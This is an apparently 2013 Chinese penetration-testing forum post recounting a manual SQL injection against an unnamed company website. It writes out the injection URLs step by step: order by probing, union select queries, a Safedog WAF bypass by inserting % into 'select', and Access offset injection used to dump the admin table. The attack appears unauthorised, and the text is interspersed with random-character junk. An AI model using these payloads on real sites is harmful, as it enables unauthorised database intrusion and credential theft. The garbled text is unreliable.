中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。3 ~, i  q3 [, p' [  a8 M1 T

/ d9 D, C* C3 ^. ?  l6 P- G! ~" S: x  W& G. V' F" ^& v8 r
顺手加个admin
" [# \# G, E3 b* p+ z1 l) b
3 ]( J1 t+ D* _3 K8 O
- h0 y1 J" ^/ {6 K( {6 O默认后台。
2 E0 r/ a( w( X+ h- b5 C) w. D( y回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
5 ]% M! C8 T# `2 k
0 S$ O$ z" G1 q' b
7 j4 e( C- v9 v2 v* c
2 r/ G1 \+ V* t3 F所以就不用御剑扫了,待会直接封IP。
6 }' Z9 u4 h* _- P6 [6 T6 ~ ( \8 c& \  f6 E, ]/ m! @2 ?0 x
用order by语句判断是否存在注入。0 j! G0 ^- p( R
http://www.xxx.com /product_show.asp?id=997 order by 14 b4 J4 B7 V4 L( z' O: s$ T4 C
http://www.xxx.com /product_show.asp?id=997 order by 100, [6 X+ g% n0 X  m: J% h$ y
现在存在注入,经测试后发现是9个字段。: C' p5 T, K) D7 V) |

7 e0 j$ @+ X8 C' n9 ^接下来进行联合查询,猜是否存在admin表。8 J& ^0 L+ a7 T+ [0 g
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​% u, r- w5 ]/ Y& k7 K  t6 f6 p/ }
3 \' A5 x7 y& a0 Q. W

% y( J" b& n/ D0 O4 Q" B3 a1 W; b" F/ U8 r8 R8 k6 I. [% a
在select中间加个%,se%lect绕过安全狗。
2 h6 b/ D2 ~3 s
: U& O$ k) j, T9 ?
/ {7 s: p) [; K% V5 {5 M, S发现存在admin表,然后开始手工猜常用的字段。6 @: K2 S2 ]+ h9 g# g. I( X8 S' U
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。* V, J8 S5 Q$ [

/ A: F  Q- B0 G8 h$ {/ v突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。; p/ o- u3 D% h  P" R5 t5 P

! _* l0 W0 {+ m- }科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。& c8 \4 ]2 W5 A" Z' K  _; Q& m5 p. L
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin! u3 G7 k7 Z: a% {$ A
好了,敏感内容出显了。​5 `$ \1 m* V; b# F3 ^

) ^" E( N9 U  I1 x" ~; x- J3 j
" F) d8 V( S3 X  C" i7 M* [# B- R; y/ k( R) g+ D





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2